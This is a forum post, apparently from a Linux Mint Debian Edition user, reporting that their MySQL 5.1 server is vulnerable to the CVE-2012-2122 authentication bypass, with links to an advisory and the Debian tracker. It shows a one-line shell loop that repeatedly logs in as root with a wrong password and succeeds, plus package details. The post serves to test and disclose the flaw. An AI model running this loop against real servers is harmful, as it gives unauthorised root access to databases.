https://community.rapid7.com/community/ ... w-in-mysql
http://security-tracker.debian.org/trac ... -2012-2122
LMDE update pack 4 - 64bit appears to be vulnerable
Code: Select all
stmiller@brahms:~$ sudo /etc/init.d/mysql start
[sudo] password for stmiller:
Starting MySQL database server: mysqld.
Checking for tables which need an upgrade, are corrupt or were
not closed cleanly..
stmiller@brahms:~$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 161
Server version: 5.1.61-2 (Debian)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
Code: Select all
stmiller@brahms:~$ dpkg -s mysql-server
Status: install ok installed
Maintainer: Debian MySQL Maintainers <firstname.lastname@example.org>
Description: MySQL database server (metapackage depending on the latest version)
This is an empty package that depends on the current "best" version of
mysql-server (currently mysql-server-5.1), as determined by the MySQL
maintainers. Install this package if in doubt about which MySQL
version you need. That will install the version recommended by the
MySQL is a fast, stable and true multi-user, multi-threaded SQL database
server. SQL (Structured Query Language) is the most popular database query
language in the world. The main goals of MySQL are speed, robustness and
ease of use.